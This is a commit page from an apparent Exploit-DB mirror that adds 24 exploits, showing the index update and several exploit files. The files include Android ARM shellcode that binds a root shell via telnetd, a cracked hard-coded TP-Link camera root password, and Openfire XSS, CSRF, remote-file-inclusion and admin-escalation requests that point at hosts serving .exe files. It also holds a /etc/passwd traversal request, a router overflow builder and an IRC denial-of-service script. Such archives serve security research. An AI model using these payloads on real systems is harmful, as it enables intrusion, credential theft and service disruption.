bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

DB: 2015-09-16

Browse source 
24 new exploits
This commit is contained in:
Offensive Security 2015-09-16 05:02:44 +00:00
parent 06b8156aa5
commit fcfafebf3e
25 changed files with 2002 additions and 0 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

24
files.csv
View file

@ -34451,6 +34451,8 @@ id,file,description,date,author,platform,type,port
38146,platforms/windows/dos/38146.html,"Microsoft Internet Explorer 11 - Stack Underflow Crash PoC",2015-09-11,Mjx,windows,dos,0
38147,platforms/windows/local/38147.pl,"Logitech Webcam Software 1.1 - eReg.exe SEH/Unicode Buffer Overflow",2015-09-11,"Robbie Corley",windows,local,0
38148,platforms/php/webapps/38148.txt,"Monsta FTP 1.6.2 - Multiple Vulnerabilities",2015-09-11,hyp3rlinx,php,webapps,80
38203,platforms/linux/remote/38203.txt,"Schmid Watson Management Console Directory Traversal Vulnerability",2013-01-09,"Dhruv Shah",linux,remote,0
38204,platforms/php/webapps/38204.txt,"Prizm Content Connect Arbitrary File Upload Vulnerability",2013-01-09,"Include Security Research",php,webapps,0
38151,platforms/windows/remote/38151.py,"Windows Media Center - Command Execution (MS15-100)",2015-09-11,R-73eN,windows,remote,0
38152,platforms/php/webapps/38152.txt,"MotoCMS admin/data/users.xml Access Restriction Weakness Information Disclosure",2013-01-08,AkaStep,php,webapps,0
38153,platforms/php/webapps/38153.txt,"cPanel WebHost Manager (WHM) /webmail/x3/mail/clientconf.html acct Parameter XSS",2012-12-27,"Christy Philip Mathew",php,webapps,0
@ -34483,3 +34485,25 @@ id,file,description,date,author,platform,type,port
38182,platforms/php/webapps/38182.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php type Parameter XSS",2013-01-09,MustLive,php,webapps,0
38183,platforms/php/webapps/38183.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/tinybrowser.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
38184,platforms/php/webapps/38184.txt,"TinyBrowser /tiny_mce/plugins/tinybrowser/edit.php Empty type Parameter Directory Listing",2013-01-09,MustLive,php,webapps,0
38185,platforms/windows/local/38185.txt,"Total Commander 8.52 - SEH Overwrite Buffer Overflow",2015-09-15,"_ Un_N0n _",windows,local,0
38186,platforms/hardware/remote/38186.txt,"TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi - Hard-Coded Credentials",2015-09-15,LiquidWorm,hardware,remote,0
38187,platforms/php/webapps/38187.txt,"WordPress CP Reservation Calendar Plugin 1.1.6 - SQL Injection",2015-09-15,"i0akiN SEC-LABORATORY",php,webapps,80
38188,platforms/jsp/webapps/38188.txt,"Openfire 3.10.2 - Unrestricted File Upload",2015-09-15,hyp3rlinx,jsp,webapps,80
38189,platforms/jsp/webapps/38189.txt,"Openfire 3.10.2 - Remote File Inclusion",2015-09-15,hyp3rlinx,jsp,webapps,0
38190,platforms/jsp/webapps/38190.txt,"Openfire 3.10.2 - Privilege Escalation",2015-09-15,hyp3rlinx,jsp,webapps,80
38191,platforms/jsp/webapps/38191.txt,"Openfire 3.10.2 - Multiple XSS Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80
38192,platforms/jsp/webapps/38192.txt,"Openfire 3.10.2 - CSRF Vulnerabilities",2015-09-15,hyp3rlinx,jsp,webapps,80
38194,platforms/android/shellcode/38194.c,"Android Shellcode Telnetd with Parameters",2015-09-15,"Steven Padilla",android,shellcode,0
38195,platforms/windows/remote/38195.rb,"MS15-100 Microsoft Windows Media Center MCL Vulnerability",2015-09-15,metasploit,windows,remote,0
38196,platforms/php/remote/38196.rb,"CMS Bolt File Upload Vulnerability",2015-09-15,metasploit,php,remote,80
38197,platforms/php/webapps/38197.txt,"Silver Peak VXOA < 6.2.11 - Multiple Vulnerabilities",2015-09-15,Security-Assessment.com,php,webapps,80
38198,platforms/windows/local/38198.txt,"Windows 10 Build 10130 - User Mode Font Driver Thread Permissions Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38199,platforms/windows/local/38199.txt,"Windows NtUserGetClipboardAccessToken Token Leak",2015-09-15,"Google Security Research",windows,local,0
38200,platforms/windows/local/38200.txt,"Windows Task Scheduler DeleteExpiredTaskAfter File Deletion Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38201,platforms/windows/local/38201.txt,"Windows CreateObjectTask TileUserBroker Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38202,platforms/windows/local/38202.txt,"Windows CreateObjectTask SettingsSyncDiagnostics Privilege Escalation",2015-09-15,"Google Security Research",windows,local,0
38205,platforms/multiple/dos/38205.py,"BT Home Hub 'uuid' field Buffer Overflow Vulnerability",2013-01-08,"Zachary Cutlip",multiple,dos,0
38206,platforms/windows/remote/38206.html,"Samsung Kies Remote Buffer Overflow Vulnerability",2013-01-09,"High-Tech Bridge",windows,remote,0
38207,platforms/php/webapps/38207.txt,"Quick.Cms/Quick.Cart Cross Site Scripting Vulnerability",2013-01-09,"High-Tech Bridge",php,webapps,0
38208,platforms/multiple/dos/38208.py,"Colloquy Remote Denial of Service Vulnerability",2013-01-09,Aph3x,multiple,dos,0
38209,platforms/php/webapps/38209.txt,"WordPress Gallery Plugin 'filename_1' Parameter Remote Arbitrary File Access Vulnerability",2013-01-10,Beni_Vanda,php,webapps,0

Can't render this file because it is too large.

245
platforms/android/shellcode/38194.c Executable file
View file

@ -0,0 +1,245 @@
/*
Title: Android/ARM - telnetd with three parameters and an environment variable
Date: 2015-07-31
Tested on: Android Emulator and Samsung Note 10.1 (Android version 4.1.2)
Author: Steven Padilla - email: spadilla@tresys.com
Organization: Tresys LLC
Vendor HomePage: www.tresys.com
Version: 1.0
Android ARM shellcode with dynamic string creation and including no
0x20, 0x0a and 0x00.
This shellcode will execute telnetd listening on port 1035. Whenever
anyone connects to port 1035 they will be presented with a shell
prompt. This code assumes that telnetd and sh are executables in the
/system/bin/ directory.
In order to minimize the length of the shellcode the beginning of the
path /system/bin/ is created once and stored three times.
The executable name (/system/bin/telnetd), the other two paramaters
(-p1035 and -l/system/bin/sh) and the environment variable
(PATH=/system/bin) are strings that are created and stored in memory
above the top of the stack. The strings are created by first moving a
byte to register1, left shitf register1 8 bits, add the next byte,
left shift again, add the next byte, left shift again and then adding
the fourth byte. Note that due to endianess the bytes are added in
reverse order. Thus if the string to be created is "/adb" the 'b'
would be moved into r1, followed by the shift and then the 'd' is
added, shift, then the 'a', shift, and finally the '/'.
In the example below the stack pointer has the value 0xbe91da08.
Right before calling the execve call (i.e., svc 1 with register 7 containing
11) register0 is loaded with the 0xbe91da24, register1 is loaded with
the 0xbe91da0c and register2 is loaded with 0xbe91da1c. The memory
above the stack should look like the following (note to make it easier
to read the strings are presented in the order they appear if you read
them as strings. If you look at each word you will see the bytes in
reverse order due to endianess) :
+----------------------------------+
0xbe91da08 | NULL | This is where the stack
| | pointer is pointing.
+----------------------------------+
0xbe91da0c | 0xbe91da24 | These first three entries
| | are pointers to the path
| | of the executable and its
| | two parameters.
+----------------------------------+
0xbe91da10 | 0xbe91da50 |
+----------------------------------+
0xbe91da14 | 0xbe91da5f |
+----------------------------------+
0xbe91da18 | NULL | The list of parameters must
| | be terminated by a NULL.
+----------------------------------+
0xbe91da1c | 0xbe91da88 | This points to the first
| | (and only) environment
| | variable.
+----------------------------------+
0xbe91da20 | NULL | The list of environment
| | variables must be terminated
| | by a NULL.
+----------------------------------+
0xbe91da24 | "//system/bin/telnetd" | This is where the name of
| | the executable and the first
| | parameter is stored.
+----------------------------------+
0xbe91da50 | "-p1035" | This is where the second
| | parameter is stored.
+----------------------------------+
0xbe91da5f | "-l/system/bin/sh" | This is where the third
| | parameter is stored.
+----------------------------------+
0xbe91da88 | "PATH=/system/bin/" | This is where the first
| | environment variable is
| | stored.
+----------------------------------+
*/
#include <stdio.h>
#include <string.h>
char *SC = "\x01\x30\x8f\xe2" //add r3,pc, #1
"\x13\xff\x2f\xe1" //bx r3
"\x78\x46" //mov r0, pc
"\x18\x30" //adds r0, 0x18
"\x92\x1a" // subs r2,r2,r2
"\x49\x1a" // subs r1, r1, r1
"\x6a\x44" // add r2, sp
"\x79\x21" // mov r1, 'y'
"\x09\x02" // LSL r1,r1, #8
"\x73\x31" // adds r1, 's'
"\x09\x02" // LSL r1,r1, #8
"\x2f\x31" // adds r1, '/'
"\x09\x02" // LSL r1,r1, #8
"\x2f\x31" // adds r1, '/'
"\x07\x91" // str r1, [sp, #4]
"\x12\x25" // mov r5, 0x12
"\x4d\x40" // eor r5,r1
"\x21\x95" // str r5, [sp, #4]
"\x43\x25" // mov r5, 0x43
"\x4d\x40" // eor r5,r1
"\x16\x95" // str r5, [sp, #4]
"\x6d\x21" // mov r1, 'm'
"\x09\x02" // LSL r1,r1, #8
"\x65\x31" // adds r1, 'e'
"\x09\x02" // LSL r1,r1, #8
"\x74\x31" // adds r1, 't'
"\x09\x02" // LSL r1,r1, #8
"\x73\x31" // adds r1, 's'
"\x08\x91" // str r1, [sp, 0x8]
"\x17\x91" // str r1, [sp, 0x17]
"\x22\x91" // str r1, [sp, 0x22]
"\x6e\x21" // mov r1, 'n'
"\x09\x02" // LSL r1,r1, #8
"\x69\x31" // adds r1, 'i'
"\x09\x02" // LSL r1,r1, #8
"\x62\x31" // adds r1, 'b'
"\x09\x02" // LSL r1,r1, #8
"\x2f\x31" // adds r1, '/'
"\x09\x91" // str r1, [sp, 0x9]
"\x18\x91" // str r1, [sp, 0x18]
"\x23\x91" // str r1, [sp, 0x23]
"\x6c\x21" // mov r1, 'l'
"\x09\x02" // LSL r1,r1, #8
"\x65\x31" // adds r1, 'e'
"\x09\x02" // LSL r1,r1, #8
"\x74\x31" // adds r1, 't'
"\x09\x02" // LSL r1,r1, #8
"\x2f\x31" // adds r1, '/'
"\x28\x24" // mov r4, 0x0f
"\x11\x51" // str r1, [r2, r4]
"\x6c\x25" // mov r5, 'l'
"\x2d\x02" // LSL r1,r1, #8
"\x0d\x35" // adds r5, 0x0d
"\x2d\x02" // LSL r1,r1, #8
"\x07\x35" // adds r5, 0x07
"\x2d\x02" // LSL r1,r1, #8
"\x4d\x40" // eor r5,r1
"\x19\x95" // str r5, [sp, 0x19]
"\x64\x21" // mov r1, 'd'
"\x09\x02" // LSL r1,r1, #8
"\x74\x31" // adds r1, 't'
"\x09\x02" // LSL r1,r1, #8
"\x65\x31" // adds r1, 'e'
"\x09\x02" // LSL r1,r1, #8
"\x6e\x31" // adds r1, 'n'
"\x0b\x91" // str r1, [sp, 0xb]
"\x49\x1a" // subs r1, r1, r1
"\x0c\x91" // str r1, [sp, 0xc]
"\x30\x21" // mov r1, '0'
"\x09\x02" // LSL r1,r1, #8
"\x31\x31" // adds r1, '1'
"\x09\x02" // LSL r1,r1, #8
"\x70\x31" // adds r1, 'p'
"\x09\x02" // LSL r1,r1, #8
"\x2d\x31" // adds r1, '-'
"\x12\x91" // str r1, [sp, #44]
"\x49\x1a" // subs r1, r1, r1
"\x35\x31" // add r1, '5'
"\x09\x02" // LSL r1,r1, #8
"\x33\x31" // adds r1, '3'
"\x13\x91" // str r1, [sp, 0x13]
"\x49\x1a" // subs r1, r1, r1
"\x14\x91" // str r1, [sp, 0x14]
"\x2d\x21" // mov r1, '-'
"\x09\x02" // LSL r1,r1, #8
"\x09\x02" // LSL r1,r1, #8
"\x09\x02" // LSL r1,r1, #8
"\x15\x91" // str r1, [sp, 0x15]
"\x49\x1a" // subs r1, r1, r1
"\x1f\x91" // str r1, [sp, 0x1f]
"\x48\x21" // mov r1, 'H'
"\x09\x02" // LSL r1,r1, #8
"\x54\x31" // adds r1, 'T'
"\x09\x02" // LSL r1,r1, #8
"\x41\x31" // adds r1, 'A'
"\x09\x02" // LSL r1,r1, #8
"\x50\x31" // adds r1, 'P'
"\x80\x24" // mov r4, 0x0f
"\x11\x51" // str r1, [r2, r4]
"\x2f\x21" // mov r1, '/'
"\x24\x91" // str r1, [sp, 0x24]
"\x04\x32" // add r2, 0x4
"\x49\x1a" // subs r1, r1, r1
"\x11\x1c" // add r1, r2, #0
"\x18\x31" // add r1, 0x18
"\x01\x91" // str r1, [sp, 0x1]
"\x2c\x31" // add r1, #40
"\x02\x91" // str r1, [sp, 0x2]
"\x0f\x31" // add r1, #4
"\x03\x91" // str r1, [sp, 0x3]
"\x29\x31" // add r1, #28
"\x05\x91" // str r1, [sp, #0x5]
"\x49\x1a" // subs r1, r1, r1
"\x04\x91" // str r1, [sp, 0x4]
"\x06\x91" // str r1, [sp, 0x6]
"\x10\x1c" // add r0, r2, #0
"\x18\x30" // add r0, 0x18
"\x11\x1c" // add r1, r2, #0
"\x10\x32" // adds r2, 0x10
"\xdb\x1a" // subs r3, r3, r3
"\x0b\x27" //movs r7,#11
"\x01\xdf"; //svc 1
int main(void)
{
(*(void(*) ()) SC) ();
return 0;
}

51
platforms/hardware/remote/38186.txt Executable file
View file

@ -0,0 +1,51 @@
TP-Link NC200/NC220 Cloud Camera 300Mbps Wi-Fi Hard-Coded Credentials
Vendor: TP-LINK Technologies Co., Ltd.
Product web page: http://www.tp-link.us
Affected version: NC220 V1 1.0.28 Build 150629 Rel.22346
NC200 V1 2.0.15 Build 150701 Rel.20962
Summary: Designed with simplicity in mind, TP-LINK's Cloud Cameras are a
fast and trouble free way to keep track on what's going on in and around
your home. Video monitoring, recording and sharing has never been easier
with the use of TP-LINKs Cloud service. The excitement of possibilities
never end.
Desc: NC220 and NC200 utilizes hard-coded credentials within its Linux
distribution image. These sets of credentials (root:root) are never exposed
to the end-user and cannot be changed through any normal operation of the
camera.
Tested on: Linux
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2015-5255
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5255.php
20.07.2015
--
Initializing...
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin |grep root
root_uImage
p2048_newroot.cer
root:$1$gt7/dy0B$6hipR95uckYG1cQPXJB.H.:0:0:Linux User,,,:/home/root:bin/sh
Nproot:x:0:
root@zslab:~# strings NC220_1.0.28_Build_150629_Rel.22346.bin | grep home > crack.me
root@zslab:~# john crack.me
Loaded 1 password hash (FreeBSD MD5 [128/128 SSE2 intrinsics 12x])
root (root)
guesses: 1 time: 0:00:00:00 DONE (Mon Aug 3 05:52:55 2015) c/s: 400 trying:
root - Userroot
Use the "--show" option to display all of the cracked passwords reliably
root@zslab:~# john crack.me --show
root:root:0:0:Linux User,,,:/home/root:/bin/sh
1 password hash cracked, 0 left
root@zslab:~#

116
platforms/jsp/webapps/38188.txt Executable file
View file

@ -0,0 +1,116 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-FILE-UPLOAD.txt
Vendor:
=========================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Unrestricted File Upload
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
Application specifies Plugin files (.jar) can be uploaded directly by using
the form, however so can the following.
.exe
.php
.jsp
.py
.sh
Exploit code(s):
===============
1) choose some malicious file using the File browser
2) click 'upload plugin'
http://localhost:9090/plugin-admin.jsp
Our malicious uploaded files will be stored under /openfire/plugins
directory.
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local
Severity Level:
=========================================================
Medium
Description:
==========================================================
Request Method(s): [+] POST
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] fileName
Affected Area(s): [+] Server
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

130
platforms/jsp/webapps/38189.txt Executable file
View file

@ -0,0 +1,130 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-RFI.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
=================================
Remote File Inclusion
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
In "available-plugins.jsp" there is no validation for plugin downloads,
allowing arbitrary file downloads
from anywhere on the internet.
On line 40: all that needs to be satisfied is the paramater is not null.
boolean downloadRequested = request.getParameter("download") != null;
String url = request.getParameter("url");
If the above condition check returns true, the application downloads
whatever file you give it.
line 54:
if (downloadRequested) {
// Download and install new plugin
updateManager.downloadPlugin(url);
// Log the event
webManager.logEvent("downloaded new plugin from "+url, null);
}
Exploit code(s):
================
1) download arbitrary filez
e.g.
http://localhost:9090/available-plugins.jsp?download=1&url=http://ghostofsin.abyss/abysmalgod.exe
Our RFI will be downloaded to "openfire\plugins" directory.
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] download, url
Affected Area(s): [+] Server
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

111
platforms/jsp/webapps/38190.txt Executable file
View file

@ -0,0 +1,111 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-PRIV-ESCALATION.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Privilege escalation
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No check is made when updating the user privileges, allowing regular user
to become an admin.
Escalation can be done remotely too if user is logged in as no CSRF token
exist.
Exploit code(s):
===============
Become admin!
http://localhost:9090/user-edit-form.jsp?username=hyp3rlinx&save=true&name=blasphemer&email=ghostofsin@abyss.com&isadmin=on
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local or Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] isadmin
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

137
platforms/jsp/webapps/38191.txt Executable file
View file

@ -0,0 +1,137 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-XSS.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
===================
Persistent & Reflected XSS
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
1) Persistent XSS exists when creating an Group Chat Bookmark, XSS will
execute each time victim accesses
the 'Group Chat Bookmarks' web page vuln parameter 'groupchatName' XSS will
be stored in 'ofbookmark'
table in 'bookmarkName' column of the MySQL DB and will be under
boomarkType as 'group_chat'.
2) Persistent XSS exists when creating URL Bookmarks, vuln parameter
'urlName' XSS will be stored in 'ofbookmark' table in
'bookmarkName' column of the MySQL DB will be under column boomarkType as
'url'.
3) Reflected XSS entry point exists in search parameter, script tags fail
but we can defeat using onMouseMove() JS function.
Exploit code(s):
===============
1) persistent XSS:
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=group_chat
Inject <script>alert(666)</script> payload into the 'Group Chat Name' field
then click 'Create'.
2) persistent XSS:
http://localhost:9090/plugins/clientcontrol/create-bookmark.jsp?type=url
Inject <script>alert('HELL')</script> payload into the 'URL Name' field
then click 'Create'.
3) Reflected XSS:
http://localhost:9090/server-session-details.jsp?hostname=
"/><script>alert(666)</script>
4) Reflected XSS:
http://localhost:9090/group-summary.jsp?search="
onMouseMove="alert('hyp3rlinx')
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Local & Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] groupchatName, urlName, hostname,
search
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

140
platforms/jsp/webapps/38192.txt Executable file
View file

@ -0,0 +1,140 @@
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/AS-OPENFIRE-CSRF.txt
Vendor:
================================
www.igniterealtime.org/projects/openfire
www.igniterealtime.org/downloads/index.jsp
Product:
================================
Openfire 3.10.2
Openfire is a real time collaboration (RTC) server licensed under the Open
Source Apache License.
It uses the only widely adopted open protocol for instant messaging, XMPP
(also called Jabber).
Vulnerability Type:
=================================
Cross site request forgery (CSRF)
CVE Reference:
==============
N/A
Vulnerability Details:
=====================
No CSRF tokens exists allowing us to take malicious actions against the
application.
1- change admin password.
2- add aribitrary users to the system
3- edit server settings e.g. turn off SSL.
4- Add rogue malicious clients with permit access (Allow all XMPP clients
to connect)
and more...
Exploit code(s):
===============
1) change admin password
<script>
function doit(){
var e=document.getElementById('HELL')
e.submit()
}
</script>
<form id="HELL" action="http://localhost:9090/user-password.jsp"
method="post">
<input type="text" name="username" value="admin" >
<input type="text" name="password" value="abc123">
<input type="text" name="passwordConfirm" value="abc123" >
<input type="password" name="update" value="Update+Password" >
</form>
2) add aribitrary users
http://localhost:9090/user-create.jsp?username=hyp3rlinx&name=hyp3rlinx&email=blasphemer@abyss.com&password=abc123&passwordConfirm=abc123&create=Create+User
3) edit server settings & turn off SSL
http://localhost:9090/server-props.jsp?serverName=myserver&sslEnabled=false&save=Save+Properties
4) add rogue malicious clients
http://localhost:9090/plugins/clientcontrol/permitted-clients.jsp?all=false&other=http%3A//maliciouso.com/666.exe&addOther=Add
Disclosure Timeline:
=========================================================
Vendor Notification: NA
Sept 14, 2015 : Public Disclosure
Exploitation Technique:
=======================
Remote
Severity Level:
=========================================================
High
Description:
==========================================================
Request Method(s): [+] POST & GET
Vulnerable Product: [+] Openfire 3.10.2
Vulnerable Parameter(s): [+] update, create, sslEnabled, other
Affected Area(s): [+] Admin
===========================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author.
The author is not responsible for any misuse of the information contained
herein and prohibits any malicious use of all security related information
or exploits by the author or elsewhere.
by hyp3rlinx

9
platforms/linux/remote/38203.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/57237/info
Schmid Watson Management Console is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.
Exploiting this issue will allow an attacker to view arbitrary files within the context of the affected application. Information harvested may aid in launching further attacks.
Schmid Watson Management Console 4.11.2.G is vulnerable; other versions may also be affected.
GET /%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/%2E%2E/etc/passwd http/1.1

41
platforms/multiple/dos/38205.py Executable file
View file

@ -0,0 +1,41 @@
source: http://www.securityfocus.com/bid/57243/info
BT Home Hub is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary checks on user-supplied data before copying it to an insufficiently sized buffer.
An attacker can exploit this issue to gain elevated privileges and execute arbitrary code with root privileges. Failed exploit attempts will likely crash the affected application.
BT Home Hub 3.0b is vulnerable; other versions may also be affected.
#
*******************************************************************************
#
*******************************************************************************
# ***************** These files are licensed GPLv2. ****************
# ******************* See included LICENSE for more info.
*******************
#
*******************************************************************************
#
*******************************************************************************
# ************************ From your leet hacking cr3w
************************
# ******************************* *******************************
# ********************************** at
**********************************
# ************ http://www.tacnetsol.com ***********
#
*******************************************************************************
# Copyright (c) 2013 Zachary Cutlip
# Tactical Network Solutions, LLC
class MsearchCrash:
def __init__(self,overflowbuffer):
self.__msearch_text__=\
"M-SEARCH * HTTP/1.1\r\n"+\
"HOST:239.255.255.250:1900\r\n"+\
"ST:uuid:"+str(overflowbuffer)+"\r\n"\
"MX:2\r\n"+\
'MAN:"ssdp:discover"'+"\r\n\r\n"
def __str__(self):
return self.__msearch_text__

122
platforms/multiple/dos/38208.py Executable file
View file

@ -0,0 +1,122 @@
source: http://www.securityfocus.com/bid/57255/info
Colloquy is prone to a remote denial-of-service vulnerability.
Successful exploits may allow the attacker to cause the application to crash, resulting in denial-of-service conditions.
Colloquy 1.3.5 and 1.3.6 are vulnerable.
###################################################################################
# # #
# # H O W - T O #
# # #
# #######################
#
# Provide the Target: Server, Port, Nickname and the script will deliver
# the payload...
#
# [!USE/]$ ./<file>.py -t <server> -p <port> -n <nickname>
#
###################################################################################
from argparse import ArgumentParser
from time import sleep
import socket
shellcode = {
# One Shot <3
'one_shot' : [ \
"687474703a2f2f782f2e2425235e26402426402426232424242425232426",
"23242623262340262a232a235e28242923404040245e2340242625232323",
"5e232526282a234026405e242623252623262e2f2e2f2e2e2f2e2e2f2324",
"2e24" ],
# 1.3.5
'1_3_5' : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c"
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
# 1.3.6 - ( Requires Sending 25 Times )
'1_3_6' : [ \
"687474703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428",
"292c7573657228292c2873656c6563742532302d2d687474703a2f2f6874",
"74703a2f2f782f3f6964783d2d312b554e494f4e2b53454c45435428292c",
"7573657228292c2873656c6563742532302d2d687474703a2f2f" ],
}
def own( sock, target, sc_key='one_shot' ):
sc = ''.join( shellcode[sc_key] )
targ = ''.join( ''.join( [ hex( ord( ch ) ) for ch in target ] ).split( '0x' ) )
msg = "505249564d534720{}203a{}0d0a".format( targ, sc )
if sc_key not in '1_3_6':
sock.send( bytes.fromhex( msg ) )
else:
try:
for x in range( 1, 26 ):
sock.send( bytes.fromhex( msg ) )
sleep( .64 )
except:
print( 'FAILED!')
def connect( uri, port, target, sc_key ):
sock = socket.socket()
try:
ret = sock.connect_ex(( uri, int( port ) ))
sock.recv(8096)
except:
print( "\t[-] Failed To Connect To {}".format( uri ) )
exit()
sock.send( b"\x4e\x49\x43\x4b\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x0d\x0a" )
sock.send( b"\x55\x53\x45\x52\x20\x7a\x65\x6d\x70\x30\x64\x61\x79\x20\x48\x45\x48\x45\x20\x48\x45\x48\x45\x20\x3a\x3c\x33\x0d\x0a" )
while True:
host_data = str( sock.recv( 8096 ).strip() )
if ' 396 ' in host_data:
print( '\t[+] Connection Successful Sending Payload To {}'.format( target ) )
own( sock, target, sc_key )
sock.send( b'QUIT\r\n' )
sock.close()
break
try:
msg = host_data.split()
if msg[0].lower() is 'ping':
sock.send( b"PONG {}\r\n".format( msg[1] ) )
continue
except:
pass
print( '\t[!] Payload Sent, Target Should Drop Shortly <3' )
if __name__ == '__main__':
parser = ArgumentParser( description='#legion Colloquy IRC DoS; Requires At Least A Nick To Target' )
parser.add_argument( '-t', '--target', dest='target', default='localhost', help="IRCD Server Uri To Connect On" )
parser.add_argument( '-p', '--port', dest='port', default=6667, help="Port To Connect On" )
parser.add_argument( '-n', '--nick', dest='nick', metavar='NICK', help="Nick To Target" )
parser.add_argument( '-s', '--shellcode', dest='shellcode', default='one_shot',
help='Shell Code To Use, ( one_shot, 1_3_5, 1_3_6 )' )
args = parser.parse_args()
if args.nick is None:
parser.print_help()
exit()
connect( args.target, args.port, args.nick, args.shellcode.strip() )

177
platforms/php/remote/38196.rb Executable file
View file

@ -0,0 +1,177 @@
##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
